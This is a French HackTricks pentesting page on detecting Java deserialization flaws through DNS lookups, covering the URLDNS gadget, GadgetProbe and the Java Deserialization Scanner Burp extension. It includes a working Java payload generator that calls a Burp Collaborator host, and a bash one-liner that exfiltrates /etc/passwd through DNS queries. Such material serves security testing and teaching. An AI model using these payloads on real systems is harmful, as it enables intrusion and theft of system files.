mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
207 lines
13 KiB
Markdown
207 lines
13 KiB
Markdown
## Désérialisation DNS Java, GadgetProbe et Scanner de Désérialisation Java
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
|
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## Requête DNS sur la désérialisation
|
|
|
|
La classe `java.net.URL` implémente `Serializable`, ce qui signifie que cette classe peut être sérialisée.
|
|
```java
|
|
public final class URL implements java.io.Serializable {
|
|
```
|
|
Cette classe a un comportement curieux. Selon la documentation : "**Deux hôtes sont considérés comme équivalents si les deux noms d'hôtes peuvent être résolus en mêmes adresses IP**".\
|
|
Ainsi, chaque fois qu'un objet URL appelle **n'importe quelle** des fonctions **`equals`** ou **`hashCode`**, une **requête DNS** pour obtenir l'adresse IP va être **envoyée**.
|
|
|
|
**Appeler** la fonction **`hashCode`** **d'un objet URL** est assez facile, il suffit d'insérer cet objet dans une `HashMap` qui va être désérialisée. Cela est dû au fait qu'à la fin de la fonction **`readObject`** de `HashMap`, ce code est exécuté :
|
|
```java
|
|
private void readObject(java.io.ObjectInputStream s)
|
|
throws IOException, ClassNotFoundException {
|
|
[ ... ]
|
|
for (int i = 0; i < mappings; i++) {
|
|
[ ... ]
|
|
putVal(hash(key), key, value, false, false);
|
|
}
|
|
```
|
|
Il va **exécuter** `putVal` avec chaque valeur à l'intérieur de la `HashMap`. Mais, plus important est l'appel à `hash` avec chaque valeur. Voici le code de la fonction `hash`:
|
|
```java
|
|
static final int hash(Object key) {
|
|
int h;
|
|
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
|
|
}
|
|
```
|
|
Comme vous pouvez l'observer, lors de la désérialisation d'une `HashMap`, la fonction `hash` va être exécutée avec chaque objet et pendant l'exécution de `hash`, la méthode `.hashCode()` de l'objet va être exécutée. Par conséquent, si vous désérialisez une `HashMap` contenant un objet `URL`, l'objet `URL` exécutera `.hashCode()`.
|
|
|
|
Maintenant, examinons le code de `URLObject.hashCode()`:
|
|
```java
|
|
public synchronized int hashCode() {
|
|
if (hashCode != -1)
|
|
return hashCode;
|
|
|
|
hashCode = handler.hashCode(this);
|
|
return hashCode;
|
|
```
|
|
Comme vous pouvez le voir, lorsque `URLObject` exécute `.hashCode()`, cela appelle `hashCode(this)`. Ensuite, vous pouvez voir le code de cette fonction :
|
|
```java
|
|
protected int hashCode(URL u) {
|
|
int h = 0;
|
|
|
|
// Generate the protocol part.
|
|
String protocol = u.getProtocol();
|
|
if (protocol != null)
|
|
h += protocol.hashCode();
|
|
|
|
// Generate the host part.
|
|
InetAddress addr = getHostAddress(u);
|
|
[ ... ]
|
|
```
|
|
Vous pouvez voir qu'un `getHostAddress` est exécuté sur le domaine, **lancant une requête DNS**.
|
|
|
|
Par conséquent, cette classe peut être **abusée** afin de **lancer** une **requête DNS** pour **démontrer** que la **désérialisation** est possible, voire même pour **exfiltrer des informations** (vous pouvez ajouter en tant que sous-domaine la sortie d'une exécution de commande).
|
|
|
|
### Exemple de code de charge utile URLDNS
|
|
|
|
Vous pouvez trouver le [code de charge utile URDNS de ysoserial ici](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Cependant, juste pour faciliter la compréhension de la façon de le coder, j'ai créé ma propre preuve de concept (basée sur celle de ysoserial) :
|
|
```java
|
|
import java.io.File;
|
|
import java.io.FileInputStream;
|
|
import java.io.FileOutputStream;
|
|
import java.io.IOException;
|
|
import java.io.ObjectInputStream;
|
|
import java.io.ObjectOutputStream;
|
|
import java.lang.reflect.Field;
|
|
import java.net.InetAddress;
|
|
import java.net.URLConnection;
|
|
import java.net.URLStreamHandler;
|
|
import java.util.HashMap;
|
|
import java.net.URL;
|
|
|
|
public class URLDNS {
|
|
public static void GeneratePayload(Object instance, String file)
|
|
throws Exception {
|
|
//Serialize the constructed payload and write it to the file
|
|
File f = new File(file);
|
|
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
|
|
out.writeObject(instance);
|
|
out.flush();
|
|
out.close();
|
|
}
|
|
public static void payloadTest(String file) throws Exception {
|
|
//Read the written payload and deserialize it
|
|
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
|
|
Object obj = in.readObject();
|
|
System.out.println(obj);
|
|
in.close();
|
|
}
|
|
|
|
public static void main(final String[] args) throws Exception {
|
|
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
|
|
HashMap ht = new HashMap(); // HashMap that will contain the URL
|
|
URLStreamHandler handler = new SilentURLStreamHandler();
|
|
URL u = new URL(null, url, handler); // URL to use as the Key
|
|
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
|
|
|
|
// During the put above, the URL's hashCode is calculated and cached.
|
|
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
|
|
final Field field = u.getClass().getDeclaredField("hashCode");
|
|
field.setAccessible(true);
|
|
field.set(u, -1);
|
|
|
|
//Test the payloads
|
|
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
|
|
}
|
|
}
|
|
|
|
|
|
class SilentURLStreamHandler extends URLStreamHandler {
|
|
|
|
protected URLConnection openConnection(URL u) throws IOException {
|
|
return null;
|
|
}
|
|
|
|
protected synchronized InetAddress getHostAddress(URL u) {
|
|
return null;
|
|
}
|
|
}
|
|
```
|
|
### Plus d'informations
|
|
|
|
* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
|
* Dans l'idée originale, la charge utile de commons collections a été modifiée pour effectuer une requête DNS, ce qui était moins fiable que la méthode proposée, mais voici le post : [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
|
|
|
## GadgetProbe
|
|
|
|
Vous pouvez télécharger [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) depuis le Burp Suite App Store (Extender).
|
|
|
|
**GadgetProbe** essaiera de déterminer si certaines **classes Java existent** sur la classe Java du serveur afin que vous puissiez savoir **si** il est **vulnérable** à une certaine exploitation connue.
|
|
|
|
### Comment ça marche
|
|
|
|
**GadgetProbe** utilisera la même **charge utile DNS de la section précédente** mais **avant** d'exécuter la requête DNS, il **essaiera de désérialiser une classe arbitraire**. Si la **classe arbitraire existe**, la **requête DNS** sera **envoyée** et GadgProbe notera que cette classe existe. Si la **requête DNS** n'est **jamais envoyée**, cela signifie que la **classe arbitraire n'a pas été désérialisée** avec succès, donc soit elle n'est pas présente, soit elle n'est pas sérialisable/exploitable.
|
|
|
|
Dans le github, [**GadgetProbe a des listes de mots**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) avec des classes Java à tester.
|
|
|
|
 (1) (1).gif>)
|
|
|
|
### Plus d'informations
|
|
|
|
* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
|
|
|
|
## Scanner de désérialisation Java
|
|
|
|
Ce scanner peut être **téléchargé** depuis le Burp App Store (**Extender**).\
|
|
L'**extension** a des **capacités passives** et **actives**.
|
|
|
|
### Passif
|
|
|
|
Par défaut, il **vérifie passivement** toutes les requêtes et réponses envoyées **à la recherche de bytes magiques sérialisés Java** et présentera une alerte de vulnérabilité si l'un d'eux est trouvé :
|
|
|
|
.png>)
|
|
|
|
### Actif
|
|
|
|
**Test manuel**
|
|
|
|
Vous pouvez sélectionner une requête, cliquer avec le bouton droit et `Envoyer la requête à DS - Test manuel`.\
|
|
Ensuite, dans l'onglet _Deserialization Scanner_ --> _Onglet de test manuel_, vous pouvez sélectionner le **point d'insertion**. Et **lancer le test** (Sélectionnez l'attaque appropriée en fonction de l'encodage utilisé).
|
|
|
|
|
|
|
|
Même si cela s'appelle "Test manuel", c'est assez **automatisé**. Il vérifiera automatiquement si la **désérialisation** est **vulnérable** à **n'importe quelle charge utile ysoserial** en vérifiant les bibliothèques présentes sur le serveur web et mettra en évidence celles qui sont vulnérables. Pour **vérifier** les **bibliothèques vulnérables**, vous pouvez choisir de lancer des **Sleeps Javas**, des **sleeps** via **la consommation CPU**, ou en utilisant **DNS** comme cela a été mentionné précédemment.
|
|
|
|
**Exploitation**
|
|
|
|
Une fois que vous avez identifié une bibliothèque vulnérable, vous pouvez envoyer la requête à l'onglet _Exploiting_.\
|
|
Dans cet onglet, vous devez **sélectionner** le **point d'injection** à nouveau, écrire la **bibliothèque vulnérable** pour laquelle vous voulez créer une charge utile, et la **commande**. Ensuite, appuyez simplement sur le bouton d'**attaque** approprié.
|
|
|
|
.png>)
|
|
|
|
### Informations d'exfiltration DNS de désérialisation Java
|
|
|
|
Faites en sorte que votre charge utile exécute quelque chose comme ce qui suit :
|
|
```bash
|
|
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
|
|
```
|
|
### Plus d'informations
|
|
|
|
* [https://techblog.mediaservice.net/2017/05/decouverte-et-exploitation-fiable-des-vulnerabilites-de-deserialisation-java/](https://techblog.mediaservice.net/2017/05/decouverte-et-exploitation-fiable-des-vulnerabilites-de-deserialisation-java/)
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
|
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|